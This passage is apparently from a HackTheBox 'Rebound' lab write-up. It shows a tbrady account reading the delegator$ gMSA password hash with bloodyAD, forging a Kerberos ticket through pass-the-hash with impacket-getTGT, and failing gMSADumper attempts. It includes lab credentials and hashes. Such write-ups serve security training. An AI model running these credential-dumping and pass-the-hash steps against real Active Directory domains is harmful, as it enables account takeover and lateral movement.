ReadgMSAPassword
according to the earlier assessment, the tbrady user has readgmsapassword access to the delegator$ account
Now that the tbrady user has been [[Rebound_Lateral_Movement_tbrady#[RemotePotato0](https //github.com/antonioCoco/RemotePotato0)|compromised]], I will be able to proceed forward
The msDS-ManagedPassword is the LDAP attribute that shows the gMSA password
I could just request it with an LDAP query.
Since I had no success with ldapsearch, I will resort to BloodyAD again
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u tbrady -p '543BOMBOMBUNmanda' --host dc01.rebound.htb get object 'delegator$' --resolve-sd --attr msDS-ManagedPassword
distinguishedname: CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
msds-managedpassword.ntlm: aad3b435b51404eeaad3b435b51404ee:9b0ccb7d34c670b2a9c81c45bc8befc3
msds-managedpassword.b64encoded: IOCJT/tYf2VGNZVrkcIZv2aLwO+6Ehw/7l7W8qzd809vkDqv2wFGs1cHaR6S9fLT3qo1SupEZbSz2V/yS+CKJDLUSVWpTSKFrogU1K5JUonhbMHPAzduYOJJr9LpgRbyGA7juR3ZyqWQz9nJnqlK6A/FcrVT92BlPdLPggRj5IAHn7GstcyTpSl+AM398LfI9P7o+ffdhg2sxk6HSrlXcQG5U1DdQCKCuKSfxhP+SZ/ztoykdM5DfWWN/yTfw0SAoiBI0TBVLZI6JFDqipbcmbOP4+ktCXIBwyRz9PGmbf2lu+9VZuw0mKR7jC3AlxgrBK2BUgm1O7yk/vwTqsL8TA==The msDS-ManagedPassword.NTLM attribute contains the NTLM hash of the delegator$ account
While I could attempt to crack the hash, I could also just use it as is with thepass_the_hash technique
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ impacket-getTGT 'rebound.htb/delegator$' -hashes aad3b435b51404eeaad3b435b51404ee:9b0ccb7d34c670b2a9c81c45bc8befc3 -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Saving ticket in delegator$.ccacheCredential validated
TGT generated for the delegator$ account
Kerberos Secrets
Technically, it’s also possible to retrieve Kerberos secrets (AES128 and AES256), which is preferred for OPSEC 3 well-known tools can be used for the operation;
- dsinternals : A PowerShell module
- gmsapasswordreader: A C# based executable
- gmsadumper: A Python script
both dsinternals and GMSAPasswordReader requires a valid session to the target system as the reading user, tbrady, whereas gMSADumper can be used remotely
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ python3 gMSADumper/gMSADumper/gMSADumper.py -u tbrady -p 543BOMBOMBUNmanda -d rebound.htb -l dc01.rebound.htb
traceback (most recent call last):
File "/home/kali/archive/htb/labs/rebound/gMSADumper/gMSADumper/gMSADumper.py", line 133, in <module>
main()
File "/home/kali/archive/htb/labs/rebound/gMSADumper/gMSADumper/gMSADumper.py", line 79, in main
conn = Connection(server, user='{}\\{}'.format(args.domain, args.username), password=args.password, authentication=NTLM, auto_bind=True)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 363, in __init__
self._do_auto_bind()
File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 412, in _do_auto_bind
raise LDAPBindError(error)
ldap3.core.exceptions.ldapbinderror: automatic bind not successful - strongerAuthRequiredThe initial attempt fails and the error says strongerAuthRequired Another attempt will be made with the TGT of the tbrady user
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ KRB5CCNAME=tbrady@dc01.rebound.htb.ccache python3 gMSADumper/gMSADumper/gMSADumper.py -k -d rebound.htb -l dc01.rebound.htb
traceback (most recent call last):
File "/home/kali/archive/htb/labs/rebound/gMSADumper/gMSADumper/gMSADumper.py", line 133, in <module>
main()
File "/home/kali/archive/htb/labs/rebound/gMSADumper/gMSADumper/gMSADumper.py", line 81, in main
conn = Connection(server, authentication=SASL, sasl_mechanism=KERBEROS, auto_bind=True)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 363, in __init__
self._do_auto_bind()
File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 389, in _do_auto_bind
self.bind(read_server_info=True)
File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 615, in bind
response = self.do_sasl_bind(controls)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 1343, in do_sasl_bind
result = sasl_gssapi(self, controls)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/ldap3/protocol/sasl/kerberos.py", line 109, in sasl_gssapi
return _posix_sasl_gssapi(connection, controls)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/ldap3/protocol/sasl/kerberos.py", line 232, in _posix_sasl_gssapi
out_token = ctx.step(in_token)
^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/decorator.py", line 232, in fun
return caller(func, *(extras + args), **kw)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/gssapi/_utils.py", line 165, in check_last_err
return func(self, *args, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/decorator.py", line 232, in fun
return caller(func, *(extras + args), **kw)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/gssapi/_utils.py", line 131, in catch_and_return_token
return func(self, *args, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/gssapi/sec_contexts.py", line 584, in step
return self._initiator_step(token=token)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/gssapi/sec_contexts.py", line 606, in _initiator_step
res = rsec_contexts.init_sec_context(self._target_name, self._creds,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "gssapi/raw/sec_contexts.pyx", line 188, in gssapi.raw.sec_contexts.init_sec_context
gssapi.raw.misc.gsserror: Major (851968): Unspecified GSS failure. Minor code may provide more information, Minor (2529639066): Cannot find KDC for realm "REBOUND.HTB"It fails again.
The tool itself does not rely on impacket’s kerberos module, but the Python gssapi package, which doesn’t appear to be working well with the current installation of Python 3.11.4
also tried with the Validation of the delegator$ account with no avail